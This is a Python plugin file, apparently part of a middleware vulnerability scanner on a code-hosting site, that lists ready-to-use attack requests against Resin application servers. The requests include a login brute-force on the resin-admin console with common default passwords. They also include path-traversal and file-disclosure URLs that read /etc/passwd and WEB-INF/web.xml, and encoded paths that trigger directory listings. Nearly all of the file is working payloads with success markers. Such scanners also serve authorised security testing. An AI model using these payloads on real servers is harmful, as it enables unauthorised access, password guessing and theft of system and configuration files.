nihaohello/N-MiddlewareScan
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
905931df7c859eaac6119c444fe4067ace875710
N-MiddlewareScan/plugins/resin_plugin.py
nihaohello 905931df7c new plugin
2019-03-28 23:56:13 +08:00

75 lines
2.6 KiB
Python
Raw Blame History

#coding=utf-8
pocs=[
{"requests_option":"POST",
"url":["/resin-admin/j_security_check?j_uri=index.php"],
"params":[],
"data":["j_username=%s&j_password=%s"],
"flag":['<th>Resin home:</th>','The Resin version','Resin Summary'],
"success":"exist /resin-admin/j_security_check?j_uri=index.php weak password",
"fail":"NOT exist /resin-admin/j_security_check?j_uri=index.php weak password",
"end":"/resin-admin/j_security_check?j_uri=index.php扫描完成",
"admin_bursk":"True",
"username":['admin'],
"password":['admin','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'],
},
{"requests_option":"GET",
"url":["/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"],
"params":[],
"data":[],
"flag":["root:"],
"success":"exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
"fail":"not exist /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd",
"end":"/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成",
"admin_bursk":"",
"username":[],
"password":[],
},
{"requests_option":"GET",
"url":["/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml"],
"params":[],
"data":[],
"flag":["xml version"],
"success":"",
"fail":"",
"end":"/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成",
"admin_bursk":"",
"username":[],
"password":[],
},
{"requests_option":"GET",
"url":["/%20..\\web-inf"],
"params":[],
"data":[],
"flag":["<h1>Directory of"],
"success":"",
"fail":"",
"end":"/%20..\\web-inf扫描完成",
"admin_bursk":"",
"username":[],
"password":[],
},
{"requests_option":"GET",
"url":["/%3f.jsp"],
"params":[],
"data":[],
"flag":["<h1>Directory of"],
"success":"",
"fail":"",
"end":"/%3f.jsp扫描完成",
"admin_bursk":"",
"username":[],
"password":[],
},
{"requests_option":"GET",
"url":["/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],
"params":[],
"data":[],
"flag":["root:"],
"success":"",
"fail":"",
"end":"/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成",
"admin_bursk":"",
"username":[],
"password":[],
},
]
Reference in New Issue View Git Blame Copy Permalink